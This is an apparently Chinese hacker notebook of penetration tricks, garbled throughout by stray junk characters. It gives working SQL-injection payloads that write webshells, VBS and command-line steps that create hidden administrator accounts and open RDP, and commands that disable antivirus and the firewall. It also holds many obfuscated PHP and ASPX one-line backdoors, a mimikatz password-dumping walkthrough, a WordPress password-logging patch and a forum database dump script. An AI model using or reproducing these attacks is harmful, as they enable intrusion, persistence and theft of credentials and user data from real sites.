( m, W& P( _# A1 y/ _& X4 ]SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
6 H: c5 S% `2 V, faccess中导出shell x5 j: w2 g+ S, c/ a. K. l) b
- B6 c0 h* o/ V# W: ~5 F* A1 Y5 Y* v! X6 I中文版本操作系统中针对mysql添加用户完整代码:( Q5 B& c3 w! k% |% g
: C0 F$ k; n% o8 c, C$ V! F7 A2 H2 Suse test;5 @' K; Q' Q- Z' [. ^, l
create table a (cmd text);
$ V9 x7 k! I2 [9 t1 oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
/ t Z9 f8 k _insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );4 F- ?2 M& Y9 M6 F; `0 @7 |* s- y
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );1 m) y8 Y. k" f, N, ~" [3 ]
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
4 f9 C1 f/ R& V* e0 Tdrop table a;
( B0 j" z; _- i" A
+ Q$ ~. i( T4 V1 C4 c英文版本:$ e% \& A5 l& R/ D* F: e
! D$ f% A2 c5 K) }' t: Ause test;
% t: Y. [3 A8 ?" D* d% D% D+ q4 bcreate table a (cmd text);5 ?8 j& x2 h- ?0 g- F, W' @
insert into a values ("set wshshell=createobject (""wscript.shell"") " );) | ^; `# t; K
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );" X" z8 e: U2 {6 M; H4 }3 a
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );! B- j" S) Q7 ]# s! j, {
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";+ @) z2 t& x. F B
drop table a;- F- d* w, V8 D
* ~8 [: O7 o. X8 k; M, E' V" u7 I
create table a (cmd BLOB);
6 M% B9 _- e5 P/ Winsert into a values (CONVERT(木马的16进制代码,CHAR));5 [: h6 e& t& Q9 M" C3 }3 n G3 i( L
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
* B5 d [* X0 Edrop table a;
# K& I- Z; X3 {7 T+ x) s9 c! ^# q/ O! O
记录一下怎么处理变态诺顿6 T0 S$ @8 ?* ^" ^" O1 ]/ a
查看诺顿服务的路径& Q7 m9 J6 I3 }8 N$ o+ N) }" a
sc qc ccSetMgr! e6 B9 C3 H V1 e, b/ k! |
然后设置权限拒绝访问。做绝一点。。
9 b% I5 `0 B* G- [9 @cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
' [# e' x& K* X3 Y3 u" F( l5 dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"3 }5 d/ d# z1 x/ M+ C* z1 [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
4 u6 E7 J% ?) ^8 B5 ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone& Z0 p2 }6 f Z, v
; D$ j* O. g& H5 F5 M4 _9 H然后再重启服务器
( Z- H U' R8 d, O+ Ziisreset /reboot
# n d+ @8 m2 L4 q# m2 B8 n* E这样就搞定了。。不过完事后。记得恢复权限。。。。
- r! M% e7 J/ n+ A* G! o/ i0 Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
: D' H% [" \5 H$ e* Lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F" M' P! v8 h2 a4 v; k5 I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
4 @2 f7 C2 ]+ `cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
% g! F9 O+ k9 Y) fSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin& {7 l6 d/ w8 g) r- R) V" A
0 l+ z4 T5 o7 C7 v* xEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')& W {/ k# [! T& r- h- N4 Q% l& k! @$ N
# u: K& v9 G+ X* L1 {: M- Q4 Jpostgresql注射的一些东西+ z3 j: q3 b7 q, G
如何获得webshell
; n) W# L) f% h: phttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 0 V) s, O# Q+ ~
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
0 m' | \0 q' ?( d1 i) @$ _http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
: v& @3 Y' u( ~如何读文件
4 h) I# j- Y: o& \, ^ a& Yhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
- I, H. O0 k% N- Ohttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
( ^& j( W# p% l, i' ~( @http://127.0.0.1/postgresql.php?id=1;select * from myfile;
& E# {$ G4 R$ I/ D; f6 C9 B/ ~9 j; K. K. O: p- x$ x
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
' a. k6 C3 m, ?2 C$ \: r w当然,这些的postgresql的数据库版本必须大于8.X
9 q, H$ g6 T; W创建一个system的函数:
. e0 `, A9 a# v9 r3 L1 ~) ]( x$ MCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
+ K8 R# n: _% E# m5 r5 d2 r" R: R
8 S: t5 z1 O; |" |0 _创建一个输出表:$ }6 \% |2 j* `, F* J6 |% A
CREATE TABLE stdout(id serial, system_out text)
+ ~: j: ]6 ~5 M, d& L0 @5 S/ w; }# _( t# X: H3 ?: q
执行shell,输出到输出表内:
' V6 n) R6 Z3 hSELECT system('uname -a > /tmp/test')
/ _' t; ~3 ~5 j3 l/ O- E
) z; Z v8 z) q' j, _ h9 icopy 输出的内容到表里面;
' T W& h) y7 \, UCOPY stdout(system_out) FROM '/tmp/test'
, W, `0 L) {- j% o; L' k+ H, z, I4 v- Y( Q% \1 F
从输出表内读取执行后的回显,判断是否执行成功
# g* m3 T$ q% p: |6 H9 N$ |6 d2 Z7 z5 p2 F7 G
SELECT system_out FROM stdout* b0 e5 r" b4 C. ]7 p
下面是测试例子7 k2 A8 y" B7 L, m
% I4 I7 l0 D1 H% I. |0 c, Z' w z& C
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
" r8 f y6 n, @6 `. m8 v& s8 G \! n. e$ z' N6 d& l
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C') G! \3 y4 h$ H, N
STRICT --
_" t/ J& C/ F- n6 ?
- H6 S/ p" n- g$ N$ ]) {; ], _/store.php?id=1; SELECT system('uname -a > /tmp/test') --
. Q8 x1 N3 Q4 \$ M; L
6 c0 W1 L7 `4 I) j; h8 u# C1 z; X% ]/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --* j' b9 B. |$ P8 q& u4 f$ m
2 q% n q' y7 D4 n; j/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
- [+ u1 W+ l9 |. |+ U! enet stop sharedaccess stop the default firewall, ?/ ]4 F' {: T& X- _- E9 V
netsh firewall show show/config default firewall. `. e X) ]$ ]0 m) G8 ~. y
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
- R: z; C6 [" ]" Z( Wnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
& A' ]! [3 c% f$ s修改3389端口方法(修改后不易被扫出)
- A6 T! |( S) v+ A: q修改服务器端的端口设置,注册表有2个地方需要修改, S" G4 e- e! G8 M
0 ?9 C! I" T: P% i( U. W[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
# x6 @6 u+ S/ X; g$ h8 P5 T& }PortNumber值,默认是3389,修改成所希望的端口,比如6000
% {$ W4 R) Y5 T, g, L& g/ V w8 `, u
6 t! l: z0 X% N4 D5 |第二个地方:9 c, @+ e5 p+ l* R
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
( _% p/ Y: V/ s! _( J2 H" ]PortNumber值,默认是3389,修改成所希望的端口,比如60007 V6 C3 i! X7 v( d, C4 b+ a# \3 `
1 o. u0 A; d4 Q; j4 g
现在这样就可以了。重启系统就可以了
$ r/ D: P! x' x$ a" ^8 ^* x5 q6 a7 U( l( y, B$ N2 @) s5 d
查看3389远程登录的脚本 M% d% k! V' `7 T8 o
保存为一个bat文件3 s1 H# `, m. I# b; L1 D
date /t >>D:\sec\TSlog\ts.log
$ M; R7 j7 c; j; v. e8 itime /t >>D:\sec\TSlog\ts.log2 ~* T+ E$ i1 D# b% S9 c: A
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
! h8 p" s* s8 V$ n' ]start Explorer& z0 I2 L `/ ~; S" e2 L
0 X: Q. n9 E' z
mstsc的参数:
/ l |( O5 W& U; S8 h# X+ H% D% H0 [ f) F4 N& B0 U3 X5 N
远程桌面连接
$ W3 a( o2 \/ }: O
) e% {0 n8 O$ R8 mMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
( ~" y6 O. z: b D! U* ?- H& g [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
3 w, z. R( `# J- P/ z X" ~6 y# T3 D5 _3 c8 T& e
<Connection File> -- 指定连接的 .rdp 文件的名称。2 m. k/ l- Y) N: Y( d- i/ O1 h! D
: G; n0 X' H# R1 F# X" ^% y
/v:<server[:port]> -- 指定要连接到的终端服务器。7 ?+ a0 P3 m K. d8 n
. `( n% \( l3 [: a. s( o/console -- 连接到服务器的控制台会话。" w# p. o* j" e
' q* n' B+ b6 |/ f- K/f -- 以全屏模式启动客户端。
5 u' I: q1 j" d
- _% b8 V. j- Q/w:<width> -- 指定远程桌面屏幕的宽度。- z5 }/ c* \ E2 z
1 g7 v! q: R8 k; D1 ?/h:<height> -- 指定远程桌面屏幕的高度。) u) M% T! p4 H
) \' c) _) x; R8 h& o" Z
/edit -- 打开指定的 .rdp 文件来编辑。/ S, h; `# l) `
# e' B9 k" S& v9 D. ~0 W9 y1 F
/migrate -- 将客户端连接管理器创建的旧版
! O0 J+ } m2 ^. c5 H6 D, c) \* H, E/ `连接文件迁移到新的 .rdp 连接文件。
' u$ U7 w2 H" ]: p0 ?( B' P& x8 {) L9 P J5 R& o
9 y% t, S) v9 L3 i其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
+ q7 O1 @/ N! k7 `( d3 d8 Fmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
/ X: c* W& [# O! A
& M3 j/ ?' A5 w! M0 O$ a命令行下开启3389 ? A W+ R+ N+ _8 o6 H5 z
net user asp.net aspnet /add
! H# X Z! F/ ?6 Onet localgroup Administrators asp.net /add, W8 {, | E* q3 f) ]+ i) f$ Q
net localgroup "Remote Desktop Users" asp.net /add8 u4 `8 N* `. L; U8 i* N1 Y; a
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D3 \% L: }$ ~7 A/ {( A
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
5 u6 `9 g) P, m9 ^0 I) V1 ?echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 10 L1 A8 k, t8 A
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
+ u; n) x* k+ K2 Fsc config rasman start= auto' J7 m6 Q! u* G7 w1 G2 A: c/ q
sc config remoteaccess start= auto
5 V8 T! p2 e1 A+ f- Bnet start rasman& ]9 ]0 \9 Z N" R' P, e. H" H
net start remoteaccess2 X8 {7 E" M/ k2 p% n& t
Media
5 D8 U* c, f1 p<form id="frmUpload" enctype="multipart/form-data"" [8 W$ j8 b R+ D
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>, p* j& d/ o0 r% p8 y
<input type="file" name="NewFile" size="50"><br>
+ T2 d7 V: U7 b9 c<input id="btnUpload" type="submit" value="Upload">) Y7 Y! Y5 t$ L. ?1 ? l; b
</form>
9 c; j& L. z+ C F O4 d$ k2 {3 T/ |. U+ N% }! |# }
control userpasswords2 查看用户的密码
\2 @% W3 w0 s( ]access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
+ {* U( ~+ j: `3 r! O% CSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a' i3 k3 }% `6 l( Y( Y( [
# c/ M b' r7 X& p3 ]3 W* s
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
& O3 H8 x& [/ {; M V8 b: `% C测试1:& P5 s6 u1 H4 M# B, O' Y
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t11 c6 [- n) y1 K ?3 I& O% ~- q' @3 j
& X9 W! E: H. n" n! G0 [( U
测试2:
l' v4 r2 {: `8 } K( t7 B1 o ]. E( H8 P
create table dirs(paths varchar(100),paths1 varchar(100), id int)5 |7 Z5 {% B+ q" C+ @8 _
7 _/ P8 r A2 ~, V8 h" o! B
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--' q( C! f' w& C
: |5 c( V( }( K; H& K2 T3 t
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; W. i( u: b) t" e) ]关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
0 I4 ]1 m6 G1 E( E. j# ^' d& ^0 m T可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
: J! |0 O0 T, @# snet stop mcafeeframework
! l. {* {' Q$ w: v- Snet stop mcshield( ~4 B9 @9 \6 c4 s3 L3 S
net stop mcafeeengineservice
3 w8 A( e! e" P- Ynet stop mctaskmanager6 b, a1 d" o5 z- Y2 s' F
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D$ [' K; j- V& m, [9 v& n
z8 z- Z8 [4 x6 C. I' }" R VNCDump.zip (4.76 KB, 下载次数: 1)
* |: d5 g7 U/ S6 x- Y5 L密码在线破解http://tools88.com/safe/vnc.php1 K/ Z. k( |8 K+ N4 m4 U
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
; d0 w, P- p8 B% L9 H3 v) w5 f- N% Y- P( K
exec master..xp_cmdshell 'net user'" A `& x6 X: @: k8 p! b
mssql执行命令。8 _) v+ q% @8 Q9 m
获取mssql的密码hash查询
' L) |9 ^! a' @/ p4 yselect name,password from master.dbo.sysxlogins" f1 S6 Z; W% Z' L$ v
6 {. [' Z! P/ }$ ?
backup log dbName with NO_LOG;
+ |! s: f# {. d* Nbackup log dbName with TRUNCATE_ONLY;
" D( {0 M; s+ R4 G* U5 TDBCC SHRINKDATABASE(dbName);/ p% q/ e% ~2 X
mssql数据库压缩1 D% f1 o; k- \7 i
- a k' B' w A( g9 X9 W9 M/ gRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK. h1 D$ ^7 s3 k; p) H1 S
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
! k& G. e6 K! l; k* x% b# m! g( T9 e: ~- G. S) J% L; S
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
7 l u" l3 P& m& K& ]( t V备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak# k) G; d/ l4 L) w" H ?4 F
4 s! N# }* f. \! e$ KDiscuz!nt35渗透要点:
4 ]+ T* k5 y1 o(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default% Q7 I: ^4 G j( o J2 w- m
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>- y; m- f+ C$ o1 P! O" U
(3)保存。
1 @ d; p, B5 J: Z4 {(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
7 H' g1 i+ U: ~9 u, ~9 l$ w$ i! v4 K! nd:\rar.exe a -r d:\1.rar d:\website\
9 g- q" ?, Z7 G/ U. i7 R- |' a递归压缩website6 A& f4 L5 \, Z( H% ~0 v
注意rar.exe的路径
3 _ }; Y: A+ T+ z$ D; W% l* K r, O; ?! m5 ^2 R4 B
<?php% O, Z' T7 m }0 Z
+ |; x9 Q+ |) t9 s% B8 Q$telok = "0${@eval($_POST[xxoo])}";
) Y4 c3 E; B3 `+ u1 U9 |
6 U& N! f$ H2 B( u% W$username = "123456";) @0 `3 o9 j5 Y% Y
6 t" E! M: [2 P
$userpwd = "123456";7 O p9 [6 T: N' R* r7 V1 D( V
1 }8 i" B, t& K, H$telhao = "123456";4 r3 k0 K( L/ D! N: d: D
4 U4 r8 S( r0 n) t$telinfo = "123456";
$ I: U0 {* l% o5 b% P1 S& ?" l- _$ m* M* x! P! D
?>; m7 P& u0 c" m& b# `8 N
php一句话未过滤插入一句话木马
+ d' `' w" S: L- M9 m5 p- }' N T1 ^' m3 Y, r, ]6 v8 |8 f [: y* F5 N
站库分离脱裤技巧
* B! g6 `, l8 s- ]exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
, a: h# k6 p' `" Bexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'- b1 _8 F: H. A: `* F
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。4 l; z" J- b7 e+ H
这儿利用的是马儿的专家模式(自己写代码)。+ `5 K; Y' K5 }
ini_set('display_errors', 1);7 w/ x. z+ o$ t, |9 ^( \
set_time_limit(0);+ a: G# _1 i4 r+ ~. I( K% a3 H7 y& x! i
error_reporting(E_ALL);* B9 S; p$ }3 b% D
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
0 k1 p6 m0 E4 ^0 v' qmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());! _$ M* \/ N5 l$ f+ M5 t% {5 c
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
8 f1 w4 Y9 T2 v+ t- D$i = 0;
7 C7 \* T+ v( @9 L+ m$tmp = ''; d2 B) A: H& r8 W8 u" L* T
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {& K! X$ n' y. i
$i = $i+1;. u3 ~7 g& A/ N; b/ |
$tmp .= implode("::", $row)."\n";6 y& Q$ l8 T1 B+ ]# ^2 j) w
if(!($i%500)){//500条写入一个文件
. L* K& f, }( [( w: N% Y: m $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';/ P' W% B# W: |$ o: l9 s) }
file_put_contents($filename,$tmp);1 U; }9 m1 Y* S6 n# A) U
$tmp = '';( c. @/ f; ?6 p: o2 K% C
}
& w6 u9 ^9 i- |3 N; u}
# ~$ U; _1 ]6 A1 E0 X+ Pmysql_free_result($result);
6 W7 H3 b0 Q+ m5 ]' ~4 M2 E/ i
4 L# g, E8 G* M
: r0 y. ?# ]9 _: t) V
7 c" q5 V$ B9 t4 `) K9 z e. Z* O//down完后delete, N( ^$ y3 |2 p% V4 i6 t
9 g# x+ z8 I1 K1 W$ X- ]5 E; _
0 ? l# Z% F* rini_set('display_errors', 1);
}6 a. ^! r# W% W# u/ R: y( N1 Merror_reporting(E_ALL);) r0 C4 b! E" x8 N2 Y4 b2 O; O
$i = 0;3 D# `' F( l, X! ~) C
while($i<32) {
( n* g* s) E' Q$ k/ m9 A2 @& n $i = $i+1;
! b. T/ ] {8 Q$ |2 ]5 k! n. | $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';8 _% G5 d" |! d
unlink($filename);$ K2 A& b" E( H+ P8 c9 H
} ; E3 g% D b9 d5 v2 o4 }( Q+ v! ]
httprint 收集操作系统指纹* [9 t$ J6 y& D4 M& N$ c
扫描192.168.1.100的所有端口
+ I6 b, A. ?( a9 [( q+ T: x; nnmap –PN –sT –sV –p0-65535 192.168.1.100
P- f3 w: X1 p8 P/ T& jhost -t ns www.owasp.org 识别的名称服务器,获取dns信息9 W( U! @4 \; G, m5 M
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
( n! p1 G' E# o8 H2 |- sNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host- s' ^$ Q4 m" L- j D' t: K
' g8 d: A/ e1 sDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
# ~' f% f: U- b/ y' N! X% B
+ n0 K P L0 |" M* W3 i MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
0 Q( z& E8 c$ w5 r2 s' N& |8 y& W5 U6 A# r& u6 b
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x5 I3 s5 o: o+ J3 `
0 R4 J# k- ]! X DNSstuff: http://www.dnsstuff.com/ (有多种服务可用): p- R4 i! T; b8 o5 N$ _
4 L) C, x+ C3 `6 q: g$ W6 [
http://net-square.com/msnpawn/index.shtml (要求安装)* A) P/ D: _2 ] @; X6 s
* d" y: T/ |" W& ^6 [8 x; R; C# z
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)0 }/ P" y. \1 z& w! T
' ^# n$ ~9 {. W7 S* e SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
6 k& ~: }: z) |4 ^4 oset names gb2312
3 x$ d4 G ?; N* i7 u/ r导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。5 P7 ^2 k# F. @2 |
+ B f. K7 u& f
mysql 密码修改
! Y& l% J8 _0 n( I4 a" e4 yUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
! L( x. @& g5 R" p3 X+ yupdate user set password=PASSWORD('antian365.com') where user='root';
( l' _3 {$ k* Y# L9 gflush privileges;. F) x! V5 h& _. `
高级的PHP一句话木马后门
4 e K+ B" f+ O1 j% L3 U' b/ E9 e! r. W K( @
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
9 i4 L. ^, @' L. [& R) \+ F I& O6 w! ]- l- f8 R# \. ^
1、
! r. \3 ]3 s* e
! I/ v# i1 ^+ r: h. d- d$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; P% _- p* t/ s
; N, t# ?% D1 \1 O5 X3 P+ @$hh("/[discuz]/e",$_POST['h'],"Access");
# w" r0 j1 P' W( e1 n+ t" f2 ^0 B, v" b0 j/ O |8 f3 p4 G
//菜刀一句话
. F$ p: ~, Q8 k3 a# h1 D" c& V
' a5 j& v3 A% s1 g/ a8 Y1 \2、
3 ]7 T) r; l7 u
8 m8 b4 o- j! ~5 x$filename=$_GET['xbid'];1 `3 W- b! Y V7 }1 Q
& n/ Z! ` ]# T$ A& M
include ($filename);! [; l; W0 F& {- _" Z/ y
; c. _0 Q+ D C8 t* A//危险的include函数,直接编译任何文件为php格式运行
! X; _: V* z2 g* r1 c; m5 T' `' _6 z, }( i) h
3、- f* O9 [% m% ?
) h& e" {( k+ v
$reg="c"."o"."p"."y";
7 l6 {! e0 j: c( k5 b; z7 R0 `6 M K4 f/ t% |
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);8 ?! @. L R3 ^
6 V3 S7 F' X6 M: W" Q7 i7 B//重命名任何文件6 m- b* J& N0 w: I) B& m0 D5 o
: V, X3 Z8 D9 t3 y. n- r5 ^
4、8 a8 c6 n K+ J3 K
- z4 x. B# V* L
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";) H( ]: m' J6 C- r# L' T$ u7 G
; P. A0 R, m2 Z/ z. p" H: j$gzid("/[discuz]/e",$_POST['h'],"Access");; X! {2 Y0 O! q! e
( _7 ?) K& j, N+ k//菜刀一句话
9 O5 ]3 v( C3 g# [0 \" v' w; [' [! K: G
5、include ($uid);
/ R) ~: ]0 m; S5 R4 Y& Z, d
8 ^" y" W* h& N; x* ^2 A//危险的include函数,直接编译任何文件为php格式运行,POST
- w) c# v1 N2 x7 ^- U5 J( c5 b
1 B: O0 P: J( f* {7 @, i6 |: x" ^8 C, D/ o6 u# {
//gif插一句话
7 \' ?7 Z) U2 ]$ M* v
5 g, \9 W8 b1 F A3 o/ m7 P6、典型一句话
/ c3 g7 y8 F: O3 _5 b
/ ?# r* D( s( k) M7 D程序后门代码$ T9 A' Q5 z$ v# v
<?php eval_r($_POST[sb])?>& Q5 V$ @7 ~0 q: c5 J0 L
程序代码3 {- d b! o' \1 ]! ]) `" D/ [
<?php @eval_r($_POST[sb])?>
: w* D l+ a+ t4 H M& V, G# j) e//容错代码! j5 U, S8 W5 n3 q+ @
程序代码
x& o! Q& P, `: X<?php assert($_POST[sb]);?>2 s3 L+ ^! g6 W# V' c; L
//使用lanker一句话客户端的专家模式执行相关的php语句
/ z" r3 S9 z# {! N9 v; _0 R程序代码8 Q9 X, |! `* c6 X+ ]/ }
<?$_POST['sa']($_POST['sb']);?>
* l0 z; G7 D4 J程序代码
& P2 @8 D3 Q, F7 }' o8 U<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
, h3 T8 `# {/ |2 X$ q0 z程序代码
! [, V4 T0 G* [4 t, ~3 d<?php
& K5 a0 z9 w; q8 {@preg_replace("/[email]/e",$_POST['h'],"error");1 V: C$ _2 ]! `% W" w
?>
) E3 f/ T* H) G8 G p8 R, @//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入4 ^' P3 |% K0 ^$ L! ~& S
程序代码5 j( c, `8 Z/ F) g4 x* x* W
<O>h=@eval_r($_POST[c]);</O>$ ~! O$ E# P+ ^7 H7 A
程序代码
- f9 c" v9 q! j. v<script language="php">@eval_r($_POST[sb])</script>
& c0 U. m5 w" b. j9 B//绕过<?限制的一句话
) @: T/ h5 o& V2 @4 |3 x. y+ A/ Y5 [
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip. K5 l- o+ o$ V, r1 N1 f
详细用法:
. t; F% ~8 y% Z) U; p# ^1、到tools目录。psexec \\127.0.0.1 cmd6 u% g j# S6 U: m% l
2、执行mimikatz
3 O7 d% h8 K+ c' r6 R% Z3、执行 privilege::debug, l% V0 F6 x6 t6 C
4、执行 inject::process lsass.exe sekurlsa.dll
$ F8 X2 L4 W5 `3 I5、执行@getLogonPasswords- z5 s6 `3 j7 l- G+ v: T
6、widget就是密码3 s4 q( I* s% [
7、exit退出,不要直接关闭否则系统会崩溃。
5 i* Q% L9 c& C1 q
. D( N1 b7 w2 [1 P/ s9 h! [http://www.monyer.com/demo/monyerjs/ js解码网站比较全面& C4 y4 `$ g, E
: f8 e8 M9 U7 n8 y$ n自动查找系统高危补丁
, V7 d# V, j+ m+ G% Wsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
6 T* L3 B* `: G" p: B
9 z3 J8 Q3 \% r9 m+ q' b3 ^- g2 u突破安全狗的一句话aspx后门
, n6 q+ v# w/ m! I- w1 d+ f+ G- b<%@ Page Language="C#" ValidateRequest="false" %>* J. r- u- y9 D- x5 {" ]
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>) o2 |) p, M& Q7 Y" N
webshell下记录WordPress登陆密码( x( H# S- U% j& U; S! q* U( v8 p
webshell下记录Wordpress登陆密码方便进一步社工
y2 [) l. i" |3 i m" G- [5 K在文件wp-login.php中539行处添加:& @8 J* K4 c' H* [" X
// log password9 \$ F. R r" ^/ w6 a
$log_user=$_POST['log'];. E+ J- V( @5 h. _3 [$ B b
$log_pwd=$_POST['pwd'];
3 g# c1 u- R1 k; k$log_ip=$_SERVER["REMOTE_ADDR"];: I7 B1 O8 i- B% p5 H
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
C% o& b/ O, a. I \6 y$txt=$txt.”\r\n”;$ k3 {1 M$ \8 @( p+ [4 ?
if($log_user&&$log_pwd&&$log_ip){
% \1 B3 U; m1 }, j3 n' ?+ w; R& q@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
3 F4 l+ ^; R) d}3 j8 A, ^2 _2 F/ ?
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。8 [8 {9 Z0 p, g/ p0 @1 X
就是搜索case ‘login’
